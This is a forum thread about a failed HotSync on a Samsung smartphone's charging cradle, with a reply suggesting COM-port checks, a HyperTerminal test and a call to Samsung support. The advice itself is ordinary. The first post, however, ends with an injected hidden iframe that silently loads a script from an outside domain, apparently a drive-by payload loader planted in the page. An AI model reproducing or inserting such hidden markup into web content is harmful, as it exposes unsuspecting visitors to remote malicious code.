+ Reply to Thread

Unhappy Hot Synch Problem

Every time I try to Synch the yellow lihgt on my charger comes on and the connection to my computer is lost. I got new batteries still no help. everything else on the phone works great!!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Your description of your problem is, to be kind, vague. Can you be a little more specific about the problem?

For instance how far does it get in sync'ing, because when you say connection lost I'm not sure if you are implying that it actually does establish a connection (which would mean it wasn't the wrong com port selected for instance).

Has it ever sync'd correctly?

I assume you are doing a synch via serial port and not IR or network etc...

If it hasn't sync'd correctly before, it maybe that you have a defective/damaged cradle or that you are not connecting your handheld to the cradle correctly. A yellow light on the cradle indicates a charging malfunction.. either a faulty connection or that it is the battery is too hot.

One thing you might try to test this is sync'ing it with a laptop via IR or connecting to it with a terminal program over serial and bypassing the software all together. Just run hyperterminal for the correct com port and hit the hotsync button. If you see some gibberish on the screen then you are connected at least in some form to the handheld. If the IR sync works but the terminal doesn't, it's probably hardware or PDA configuration thats the problem. If it works on terminal, try reinstalling palm desktop and make sure you have the correct port selected at a slow speed or automatically detect (try both).

Of course you could also try calling Samsung.. hopefully it hasn't been more than a year since you purchased the phone if the cradle is problematic.... Here's samsung's no.:
    1-888-987-HELP (1-888-987-4357) and press 1 for English or 2 for Spanish, 1 for Wireless Phones, and 2 for Service and Technical Support in the US.
    -Nuncio